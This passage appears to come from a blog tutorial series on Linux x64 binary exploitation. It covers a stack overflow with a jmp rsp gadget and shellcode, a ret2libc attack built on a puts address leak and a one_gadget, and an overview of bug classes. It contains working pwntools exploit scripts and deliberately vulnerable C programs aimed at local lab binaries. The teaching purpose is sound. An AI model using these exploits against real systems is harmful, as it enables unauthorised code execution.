program crashed, we can see that the second gadget should work with its constraints, because we control the C’s (43).</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>x/gx $rsp+0x40 0x7ffcc4538c98: 0x4343434343434343 -&gt; change "C"*50 to "\x00"*100 and start the script again x/gx $rsp+0x40 0x7ffe6cdff488: 0x0000000000000000 </code></pre></div></div> <p>Let’s try it..</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">payload2</span> <span class="o">=</span> <span class="s">""</span><span class="p">.</span><span class="n">join</span><span class="p">([</span><span class="s">"A"</span><span class="o">*</span><span class="mi">40</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="n">libc_base</span> <span class="o">+</span> <span class="n">one_gadget</span><span class="p">),</span> <span class="c1"># pop a shell </span> <span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="o">*</span><span class="mi">100</span><span class="p">])</span> </code></pre></div></div> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gef➤ c Continuing. process 9645 is executing new program: /bin/dash </code></pre></div></div> <p>We got it!</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[+] Waiting for debugger: Done [*] Puts @ 0x7f88bec589c0 [*] libc base @ 0x7f88bebd8000 [*] Switching to interactive mode AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"s¾\x88\x7f OK $ ls chapter_4 chapter_4.c chapter_4_exploit.py </code></pre></div></div> <p>Final exploit:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="k">def</span> <span class="nf">pad_null_bytes</span><span class="p">(</span><span class="n">value</span><span class="p">):</span> <span class="k">return</span> <span class="n">value</span> <span class="o">+</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">*</span> <span class="p">(</span><span class="mi">8</span><span class="o">-</span><span class="nb">len</span><span class="p">(</span><span class="n">value</span><span class="p">))</span> <span class="n">chapter_4_elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">"./chapter_4"</span><span class="p">)</span> <span class="n">r</span> <span class="o">=</span> <span class="n">chapter_4_elf</span><span class="p">.</span><span class="n">process</span><span class="p">()</span> <span class="n">context</span><span class="p">.</span><span class="n">binary</span> <span class="o">=</span> <span class="s">'./chapter_4'</span> <span class="c1"># libc </span><span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">"/lib/x86_64-linux-gnu/libc.so.6"</span><span class="p">)</span> <span class="c1"># attach gdb and continue </span><span class="n">gdb</span><span class="p">.</span><span class="n">attach</span><span class="p">(</span><span class="n">r</span><span class="p">.</span><span class="n">pid</span><span class="p">,</span> <span class="s">"""c"""</span><span class="p">)</span> <span class="s">""" one_gadget /lib/x86_64-linux-gnu/libc.so.6 0x4f2c5 execve("/bin/sh", rsp+0x40, environ) constraints: rcx == NULL 0x4f322 execve("/bin/sh", rsp+0x40, environ) constraints: [rsp+0x40] == NULL 0x10a38c execve("/bin/sh", rsp+0x70, environ) constraints: [rsp+0x70] == NULL """</span> <span class="n">one_gadget</span> <span class="o">=</span> <span class="mh">0x4f322</span> <span class="n">payload</span> <span class="o">=</span> <span class="s">""</span><span class="p">.</span><span class="n">join</span><span class="p">([</span><span class="s">"A"</span><span class="o">*</span><span class="mi">40</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x00000000004006b3</span><span class="p">),</span> <span class="c1"># pop rdi ; ret </span> <span class="n">p64</span><span class="p">(</span><span class="n">chapter_4_elf</span><span class="p">.</span><span class="n">got</span><span class="p">[</span><span class="s">"puts"</span><span class="p">]),</span> <span class="c1"># value for rdi </span> <span class="n">p64</span><span class="p">(</span><span class="n">chapter_4_elf</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">"puts"</span><span class="p">]),</span> <span class="c1"># return address </span> <span class="n">p64</span><span class="p">(</span><span class="n">chapter_4_elf</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">"main"</span><span class="p">]),</span> <span class="c1"># return to main </span> <span class="s">"C"</span><span class="o">*</span><span class="mi">50</span><span class="p">])</span> <span class="n">r</span><span class="p">.</span><span class="n">clean</span><span class="p">()</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"OK</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span> <span class="n">puts_leak</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">pad_null_bytes</span><span class="p">(</span><span class="n">r</span><span class="p">.</span><span class="n">readline</span><span class="p">()[:</span><span class="o">-</span><span class="mi">1</span><span class="p">]))</span> <span class="c1"># remove newline + null byte padding + unpack to integer (8 byte) </span><span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"Puts @ %s"</span> <span class="o">%</span> <span class="nb">hex</span><span class="p">(</span><span class="n">puts_leak</span><span class="p">))</span> <span class="n">libc_base</span> <span class="o">=</span> <span class="n">puts_leak</span> <span class="o">-</span> <span class="n">libc</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">"puts"</span><span class="p">]</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"libc base @ %s"</span> <span class="o">%</span> <span class="nb">hex</span><span class="p">(</span><span class="n">libc_base</span><span class="p">))</span> <span class="n">payload2</span> <span class="o">=</span> <span class="s">""</span><span class="p">.</span><span class="n">join</span><span class="p">([</span><span class="s">"A"</span><span class="o">*</span><span class="mi">40</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="n">libc_base</span> <span class="o">+</span> <span class="n">one_gadget</span><span class="p">),</span> <span class="c1"># pop a shell </span> <span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="o">*</span><span class="mi">100</span><span class="p">])</span> <span class="n">r</span><span class="p">.</span><span class="n">clean</span><span class="p">()</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload2</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span> <span class="c1"># we don't want to close the application </span></code></pre></div></div> <hr /> <p>Please be patient with yourself and learn slowly, so that you understand everything correctly.</p> <p>Happy Hacking!</p>made0x78This time we will activate non-executable stack and we’re going to build our first mini ROP-Chain to leak memory addresses! Basic ASLR is of course still enabled (only Heap and Stack randomized). I will also introduce some more features of pwntools.Binary Exploitation Series (3): Your first Exploit2018-11-16T00:00:00+00:002018-11-16T00:00:00+00:00https://made0x78.com/bseries-your-first-exploit<p>Our first target is a really simple binary where we have basic ASLR enabled (only Heap and Stack are randomized). For this example, we will disable other protections like non-executable memory regions or PIE to make our stack overflow easier.</p> <h2 id="target">Target</h2> <p>The following code snippet is a simple C program that reads 200 bytes from <code class="language-plaintext highlighter-rouge">stdin</code> to a buffer which has only a size of 16 bytes. Therefore, we can write out of bounds. We compile the target with an executable stack and no other protections. Note, that ASLR is enabled because this is on today’s operation systems most of the time the case.</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; </span> <span class="c1">//gcc -m64 -o chapter_3 chapter_3.c -no-pie -fno-stack-protector -z execstack -masm=intel</span> <span class="c1">// help function to make this task easier, ignore it</span> <span class="kt">void</span> <span class="nf">help</span><span class="p">()</span> <span class="p">{</span> <span class="n">asm</span><span class="p">(</span><span class="s">"jmp rsp"</span><span class="p">);</span> <span class="p">}</span> <span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span> <span class="p">{</span> <span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span> <span class="c1">// 16 byte buffer</span> <span class="n">fgets</span><span class="p">(</span><span class="n">buffer</span><span class="p">,</span> <span class="mi">200</span><span class="p">,</span> <span class="n">stdin</span><span class="p">);</span> <span class="c1">// bug, we'll read 200 bytes into a 16 byte buffer</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">// triggers return / return address is overflowed</span> <span class="p">}</span> </code></pre></div></div> <h2 id="analysis">Analysis</h2> <p>First, we load the <a href="/downloads/bseries/chapter_3/chapter_3">binary</a> into <code class="language-plaintext highlighter-rouge">gdb</code>.<br /></p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gdb -q ./chapter_3 Reading symbols from ./chapter_3...(no debugging symbols found)...done. gef➤ checksec # to check if there are any protections [+] checksec for '/BinaryExploitationSeries/Chapter 3/chapter_3' Canary : No NX : No PIE : No Fortify : No RelRO : Partial gef➤ disassemble main Dump of assembler code for function main: 0x0000000000400527 &lt;+0&gt;: push rbp 0x0000000000400528 &lt;+1&gt;: mov rbp,rsp 0x000000000040052b &lt;+4&gt;: sub rsp,0x20 0x000000000040052f &lt;+8&gt;: mov DWORD PTR [rbp-0x14],edi # arg1 argc 0x0000000000400532 &lt;+11&gt;: mov QWORD PTR [rbp-0x20],rsi # arg2 argv 0x0000000000400536 &lt;+15&gt;: mov rdx,QWORD PTR [rip+0x200af3] # 0x601030 &lt;stdin@@GLIBC_2.2.5&gt; 0x000000000040053d &lt;+22&gt;: lea rax,[rbp-0x10] # buffer 0x0000000000400541 &lt;+26&gt;: mov esi,0xc8 # count = 200 0x0000000000400546 &lt;+31&gt;: mov rdi,rax 0x0000000000400549 &lt;+34&gt;: call 0x400430 &lt;fgets@plt&gt; 0x000000000040054e &lt;+39&gt;: mov eax,0x0 # return value = 0 0x0000000000400553 &lt;+44&gt;: leave 0x0000000000400554 &lt;+45&gt;: ret End of assembler dump. </code></pre></div></div> <p>We can see at <code class="language-plaintext highlighter-rouge">main+22</code> that our buffer is stored at <code class="language-plaintext highlighter-rouge">rbp+0x10</code> and is used as an argument for <code class="language-plaintext highlighter-rouge">fgets</code>. Let’s try to overflow the buffer. For the payload generation we will use <code class="language-plaintext highlighter-rouge">ipython</code>.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Payload in ipython: In [1]: "A"*16+"B"*8+"C"*8 Out[1]: 'AAAAAAAAAAAAAAAABBBBBBBBCCCCCCCC' # our payload </code></pre></div></div> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gef➤ run Starting program: /BinaryExploitationSeries/Chapter 3/chapter_3 AAAAAAAAAAAAAAAABBBBBBBBCCCCCCCC # our payload ... [#0] Id 1, Name: "chapter_3", stopped, reason: SIGSEGV # binary crashed gef➤ x/gx $rbp 0x4242424242424242 # rbp is overwritten with B's gef➤ x/gx $rsp # show a giant word (64-bit value) at $rsp (stack pointer) 0x7fffffffddb8: 0x4343434343434343 # binary tried to return to 8x C's which is forbidden since 64-bit Intel architecture only uses the first # 6 bytes to address an instruction. (0x0000414141414141) </code></pre></div></div> <p>Let’s change the return address to a valid value.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Payload: AAAAAAAAAAAAAAAABBBBBBBBCCCCC # we only send 5x C's because we have a newline (0x0a) at the end # we can get rid of the newline if we directly use python or pipe from a file [#0] Id 1, Name: "chapter_3", stopped, reason: SIGSEGV ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ trace ]──── ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── 0x00000a4343434343 in ?? () # Now we have redirected execution to 0xa4343434343 which is an invalid address. # We can verify the redirection with gef➤ x/gx $rip 0xa4343434343 </code></pre></div></div> <p>For the next steps, we put a breakpoint on the return instruction of the main to see our stack layout before returning.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>b *main+45 </code></pre></div></div> <p>Additionally, we provide some more data on the stack to have a better understanding of the data in the registers and on the stack.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>New Payload: "A"*16+"B"*8+"C"*8+"D"*100 $rax : 0x0 $rbx : 0x0 $rcx : 0x4444444444444444 ("DDDDDDDD"?) $rdx : 0x7ffff7dd18d0 → 0x0000000000000000 $rsp : 0x7fffffffddb8 → "CCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[...]" $rbp : 0x4242424242424242 ("BBBBBBBB"?) $rsi : 0x7fffffffdda0 → "AAAAAAAAAAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDDDDDDDDDDD[...]" $rdi : 0x7fffffffde25 → 0x0000000000000000 $rip : 0x40055d → &lt;main+45&gt; ret $r8 : 0x6022e5 → 0x0000000000000000 $r9 : 0x4444444444444444 ("DDDDDDDD"?) $r10 : 0x4444444444444444 ("DDDDDDDD"?) $r11 : 0x4444444444444444 ("DDDDDDDD"?) $r12 : 0x400440 → &lt;_start+0&gt; xor ebp, ebp $r13 : 0x7fffffffde90 → 0x0000000000000001 $r14 : 0x0 $r15 : 0x0 $eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification] $gs: 0x0000 $ss: 0x002b $cs: 0x0033 $es: 0x0000 $fs: 0x0000 $ds: 0x0000 ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ stack ]──── 0x00007fffffffddb8│+0x00: "CCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[...]" ← $rsp 0x00007fffffffddc0│+0x08: "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[...]" 0x00007fffffffddc8│+0x10: "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[...]" 0x00007fffffffddd0│+0x18: "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[...]" 0x00007fffffffddd8│+0x20: "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[...]" 0x00007fffffffdde0│+0x28: "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[...]" 0x00007fffffffdde8│+0x30: "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[...]" 0x00007fffffffddf0│+0x38: "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD[...]" ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ code:i386:x86-64 ]──── 0x400552 &lt;main+34&gt; call 0x400430 &lt;fgets@plt&gt; 0x400557 &lt;main+39&gt; mov eax, 0x0 0x40055c &lt;main+44&gt; leave → 0x40055d &lt;main+45&gt; ret [!] Cannot disassemble from $PC ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ threads ]──── [#0] Id 1, Name: "chapter_3", stopped, reason: BREAKPOINT </code></pre></div></div> <p>Before you read any further, be sure that you understood what ASLR (Address Space Layout Randomization) and NX (Non-Executable Stack) means.</p> <p>Since we have an executable stack, we can put our shellcode directly on the stack. The problem is, that we still have ASLR enabled and therefore, can’t reliably know where our shellcode is placed. To solve this problem, we can use a so-called gadget. Gadgets are small parts of an executable section (in general instructions of the <code class="language-plaintext highlighter-rouge">.text</code> section) which have always a return/jmp instruction (an instruction which redirects the execution flow) at the end.<br /> For example:<br /></p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Gadget1: pop rdx # pull an 8-byte value from the top of the stack ret # return Gadget2: mov rax, rsi JMP rax </code></pre></div></div> <p>Now, the idea is, that we can use these gadgets for our purpose. If we place the address of gadget1 as the return address of our function we can redirect the execution flow to this gadget.<br /><br /> Where do we find these gadgets?<br /> We could use manual analysis of the binary to find suitable gadgets but we can also do this automatically with <code class="language-plaintext highlighter-rouge">ropper</code> or <code class="language-plaintext highlighter-rouge">ROPgadget</code>.<br /></p> <p>For this target, we need a gadget that redirects the execution flow to our buffer (best case our D’s on the stack). If we look carefully, we can see that the <code class="language-plaintext highlighter-rouge">jmp rsp</code> gadget of our help function is available. This gadget is perfect, because after we triggered the overflow via <code class="language-plaintext highlighter-rouge">ret</code> the <code class="language-plaintext highlighter-rouge">rsp</code> register points to the first byte of our payload after the <code class="language-plaintext highlighter-rouge">return address</code> which is, in fact, the first D.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ROPgadget --binary chapter_3 | grep jmp 0x000000000040049e : adc byte ptr [rax], ah ; jmp rax 0x000000000040060d : add byte ptr [rax], al ; add byte ptr [rdi + rdi*8 - 1], cl ; jmp rsp 0x000000000040060f : add byte ptr [rdi + rdi*8 - 1], cl ; jmp rsp 0x000000000040060b : inc esp ; add byte ptr [rax], al ; add byte ptr [rdi + rdi*8 - 1], cl ; jmp rsp 0x0000000000400499 : je 0x4004b0 ; pop rbp ; mov edi, 0x601030 ; jmp rax 0x00000000004004db : je 0x4004f0 ; pop rbp ; mov edi, 0x601030 ; jmp rax 0x000000000040068b : jmp qword ptr [rax] 0x00000000004004a1 : jmp rax 0x000000000040052b : jmp rsp &lt;-------- 0x0000000000400526 : mov dword ptr [rbp + 0x48], edx ; mov ebp, esp ; jmp rsp 0x0000000000400529 : mov ebp, esp ; jmp rsp 0x000000000040049c : mov edi, 0x601030 ; jmp rax 0x0000000000400528 : mov rbp, rsp ; jmp rsp 0x000000000040049b : pop rbp ; mov edi, 0x601030 ; jmp rax 0x0000000000400527 : push rbp ; mov rbp, rsp ; jmp rsp </code></pre></div></div> <p>Let’s write our first exploit:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">r</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s">"./chapter_3"</span><span class="p">)</span> <span class="n">context</span><span class="p">.</span><span class="n">binary</span> <span class="o">=</span> <span class="s">'./chapter_3'</span> <span class="c1"># attach gdb and continue </span><span class="n">gdb</span><span class="p">.</span><span class="n">attach</span><span class="p">(</span><span class="n">r</span><span class="p">.</span><span class="n">pid</span><span class="p">,</span> <span class="s">"""c"""</span><span class="p">)</span> <span class="n">gadget</span> <span class="o">=</span> <span class="mh">0x000000000040052b</span> <span class="c1"># jmp rsp </span> <span class="n">payload</span> <span class="o">=</span> <span class="s">"A"</span><span class="o">*</span><span class="mi">16</span><span class="o">+</span><span class="s">"B"</span><span class="o">*</span><span class="mi">8</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">gadget</span><span class="p">)</span> <span class="c1"># return address, p64 converts our address to little endian because that's the correct representation in memory # \xcc -&gt; is a software breakpoint (int3). If our redirection of the execution worked, we should break </span><span class="n">payload</span> <span class="o">+=</span> <span class="s">"</span><span class="se">\xcc</span><span class="s">"</span><span class="o">*</span><span class="mi">100</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span> <span class="c1"># we don't want to close the application </span></code></pre></div></div> <p>We can see in <code class="language-plaintext highlighter-rouge">gdb</code> that the target triggered a <code class="language-plaintext highlighter-rouge">sigtrap</code> while executing our buffer. Our gadget worked!<br /> Now we just have to replace our buffer with real shellcode. This is very easy with pwntools because it has some shellcodes inbuilt.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">r</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s">"./chapter_3"</span><span class="p">)</span> <span class="n">context</span><span class="p">.</span><span class="n">binary</span> <span class="o">=</span> <span class="s">'./chapter_3'</span> <span class="c1"># attach gdb and continue </span><span class="n">gdb</span><span class="p">.</span><span class="n">attach</span><span class="p">(</span><span class="n">r</span><span class="p">.</span><span class="n">pid</span><span class="p">,</span> <span class="s">"""c"""</span><span class="p">)</span> <span class="n">gadget</span> <span class="o">=</span> <span class="mh">0x000000000040052b</span> <span class="c1"># jmp rsp </span> <span class="n">payload</span> <span class="o">=</span> <span class="s">"A"</span><span class="o">*</span><span class="mi">16</span><span class="o">+</span><span class="s">"B"</span><span class="o">*</span><span class="mi">8</span> <span class="n">payload</span> <span class="o">+=</span> <span class="n">p64</span><span class="p">(</span><span class="n">gadget</span><span class="p">)</span> <span class="c1"># return address, p64 converts our address to little endian because that's the correct representation in memory # \xcc -&gt; is a software breakpoint (int3). If our redirection of the execution worked, we should break # payload += "\xcc"*100 </span><span class="n">payload</span> <span class="o">+=</span> <span class="n">asm</span><span class="p">(</span><span class="n">shellcraft</span><span class="p">.</span><span class="n">sh</span><span class="p">())</span> <span class="c1"># shellcode to spawn a shell </span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span> <span class="c1"># we don't want to close the application </span></code></pre></div></div> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python chapter_3_exploit.py [+] Starting local process './chapter_3': pid 5622 [*] '/BinaryExploitationSeries/Chapter 3/chapter_3' Arch: amd64-64-little RelRO: Partial RelRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments [*] running in new terminal: /usr/bin/gdb -q "/BinaryExploitationSeries/Chapter 3/chapter_3" 5622 -x "/tmp/pwne4TDcJ.gdb" [+] Waiting for debugger: Done [*] Switching to interactive mode $ ls chapter_3 chapter_3.c chapter_3_exploit.py $ </code></pre></div></div> <p>Yeah, we popped our first shell!</p> <hr /> <p>The next post will be about bypassing non-executable stack aka return to libc and a small information leak.<br /> Happy Hacking!</p>made0x78Our first target is a really simple binary where we have basic ASLR enabled (only Heap and Stack are randomized). For this example, we will disable other protections like non-executable memory regions or PIE to make our stack overflow easier.Binary Exploitation Series (2): Bug Classes2018-11-15T00:00:00+00:002018-11-15T00:00:00+00:00https://made0x78.com/bseries-bug-classes<p>This post gives a brief overview of some bug classes, but it will not cover everything in detail. I’ll provide some additional resources for bug classes which I’m not covering in this series.</p> <h2 id="how-to-find-vulnerabilities">How to find vulnerabilities?</h2> <p>There are two essential ways to identify vulnerabilities in software. Fuzzing and static/dynamic code analysis. While fuzzing is a more “aggressive” way of spamming different test cases against the program, an audit is a more focused task. In CTF’s I prefer the manual analysis of the target because most of the time bugs are somewhat hidden and you can find a magic value easier with a disassembler instead of random inputs as test cases.</p> <h2 id="bug-classes">Bug Classes</h2> <p>There are many different possible attack vectors in today’s native binaries. I won’t cover all of them but to give you an idea, here is a small list:</p> <ul> <li>Stack Buffer Overflows</li> <li>Heap Buffer Overflows</li> <li>Format String Attacks</li> <li>Use After Free (UAF)</li> <li>Information Leaks (e.g. Format String Attacks, Off by One)</li> <li>Logic Flaws</li> <li>…</li> </ul> <h3 id="stack-based-buffer-overflows">Stack Based Buffer Overflows</h3> <p>Stack-based buffer overflows are (often) a simple way to get code execution on the target. The best way to explain such an attack is with an example, like always. ;-)<br /> The following function is treated as 32-bit (architecture).</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">vuln_function</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">input</span><span class="p">)</span> <span class="p">{</span> <span class="kt">char</span> <span class="n">local_buffer</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span> <span class="n">strcpy</span><span class="p">(</span><span class="n">local_buffer</span><span class="p">,</span> <span class="n">input</span><span class="p">);</span> <span class="p">}</span> </code></pre></div></div> <p>The main idea of a buffer overflow is that we can write out of bounds of a variable e.g. an array. This means, that we can fill a buffer on the stack (here 32 bytes) with more data than it can store.</p> <p>In the following figure, we see the stack of the above function. <code class="language-plaintext highlighter-rouge">ESP</code> is the stack pointer and <code class="language-plaintext highlighter-rouge">EBP</code> is the base pointer.<br /> <img src="/assets/images/bseries_ch1_stack1.png" width="400" /><br /> If we have “AAAA\0” as an input, the stack is as follows:<br /> <img src="/assets/images/bseries_ch1_stack2.png" width="400" /><br /> If we put more data than the buffer can hold (e.g. <code class="language-plaintext highlighter-rouge">"A"*32 + "B"*4 + "C"*4</code>) we can overwrite the saved base pointer and the return address of the function.<br /> <img src="/assets/images/bseries_ch1_stack3.png" width="400" /><br /> As soon as we return from the function (<code class="language-plaintext highlighter-rouge">ret</code>) the C’s will be used as the next instruction pointer and we get a SEGFAULT. Therefore, we know that something is corrupted and we may have control of the execution flow (without protections enabled, see later chapters). Important to note, that you could overwrite other variables too. That means, that perhaps you do not need to overwrite the return address because overwriting a specific variable on the stack is enough to achieve your goal.<br /></p> <h3 id="heap-exploitation">Heap Exploitation</h3> <p>Heap-based buffer overflows are in general the same as stack-based buffer overflows, but you are overflowing a buffer on the heap. Therefore, you cannot directly overwrite e.g. a return address but rather have to figure out how the application works. Then you can manipulate other variables like pointer to strings (you’ll maybe get a write/read primitive), heap metadata and even function pointers on the heap (e.g. a struct which has pointers to other functions) to get control over the execution flow.<br /> I can recommend <a href="https://github.com/shellphish/how2heap">How2Heap</a> which covers a lot of heap exploitation techniques.</p> <h3 id="format-string-attacks">Format String Attacks</h3> <p>Format strings can be used in a few functions like <a href="http://www.cplusplus.com/reference/cstdio/printf/">printf</a>.</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">char</span> <span class="o">*</span><span class="n">name</span> <span class="o">=</span> <span class="s">"MyName"</span><span class="p">;</span> <span class="kt">int</span> <span class="n">age</span> <span class="o">=</span> <span class="mi">34</span><span class="p">;</span> <span class="n">printf</span><span class="p">(</span><span class="s">"%s is %d years old."</span><span class="p">,</span> <span class="n">name</span><span class="p">,</span> <span class="n">age</span><span class="p">);</span> </code></pre></div></div> <p>In this example, we have a format string (arg1) and we replace the <code class="language-plaintext highlighter-rouge">%s</code> with the content of the second argument <code class="language-plaintext highlighter-rouge">name</code> and the <code class="language-plaintext highlighter-rouge">%d</code> formatter with the value of <code class="language-plaintext highlighter-rouge">age</code>. The vulnerability occurs if we let the user manipulate or even set the format string.<br /> For example:</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">30</span><span class="p">];</span> <span class="kt">int</span> <span class="n">count</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">29</span><span class="p">);</span> <span class="n">buf</span><span class="p">[</span><span class="n">count</span><span class="p">]</span> <span class="o">=</span> <span class="sc">'\0'</span><span class="p">;</span> <span class="n">printf</span><span class="p">(</span><span class="n">buf</span><span class="p">);</span> <span class="c1">// buffer could contain formatter -&gt; %x %s %c ...</span> </code></pre></div></div> <p>When we put the string <code class="language-plaintext highlighter-rouge">%x%x%x</code> as a buffer for <code class="language-plaintext highlighter-rouge">printf</code> we can leak data of the stack. We can also read arbitrary addresses and also write to arbitrary addresses in memory. You can read more about this type of exploitation at <a href="http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf">Format String Attacks syr.edu</a> or watch a video of <a href="https://www.youtube.com/watch?v=0WvrSfcdq1I">LiveOverflow</a><br /> Look out for functions like: <code class="language-plaintext highlighter-rouge">printf</code>, <code class="language-plaintext highlighter-rouge">sprintf</code>, <code class="language-plaintext highlighter-rouge">vprintf</code>, <code class="language-plaintext highlighter-rouge">vsprintf</code>, ….</p> <hr /> <p>That’s it for today. Next time, we’ll finally exploit our first target!</p> <p>See you soon.</p>made0x78This post gives a brief overview of some bug classes, but it will not cover everything in detail. I’ll provide some additional resources for bug classes which I’m not covering in this series.Binary Exploitation Series (1): Environment Setup2018-11-08T00:00:00+00:002018-11-08T00:00:00+00:00https://made0x78.com/bseries-env-setup<h1 id="foreword">Foreword</h1> <p>This series will cover some basic exploitation techniques on Linux systems (x64) which are getting more advanced during the series. The main focus will be on bypassing protection mechanisms of modern systems like ASLR, non-executable stack, Stack Cookies and position-independent code. Each technical topic will be hands-on and I will provide an example to try it yourself and follow along.</p> <h1 id="overview">Overview</h1> <p>The following table shows some topics I will write about and it might be updated over time.<br /></p> <table> <thead> <tr> <th>Chapter</th> <th>Topic</th> <th>Active Protections</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>Environment Setup</td> <td>-</td> </tr> <tr> <td>2</td> <td><a href="/bseries-bug-classes/">Bug Classes</a></td> <td>-</td> </tr> <tr> <td>3</td> <td><a href="/bseries-your-first-exploit/">Your first Exploit</a></td> <td>ASLR</td> </tr> <tr> <td>4</td> <td><a href="/bseries-ret2libc/">Return 2 Libc</a></td> <td>ASLR, NX</td> </tr> <tr> <td>5</td> <td><a href="/bseries-how-to-leak-data">How to leak data?</a></td> <td>Mixed</td> </tr> <tr> <td>6</td> <td><a href="/bseries-defeat-stack-cookies/">Defeating Stack Cookies</a></td> <td>ASLR, NX, Stack Cookies</td> </tr> <tr> <td>7</td> <td><a href="/bseries-fullrelro/">Full RelRO Bypass</a></td> <td>ASLR, NX, Stack Cookies, Full RelRO</td> </tr> </tbody> </table> <h1 id="introduction">Introduction</h1> <p>Today’s post will cover a basic setup for a virtual environment to 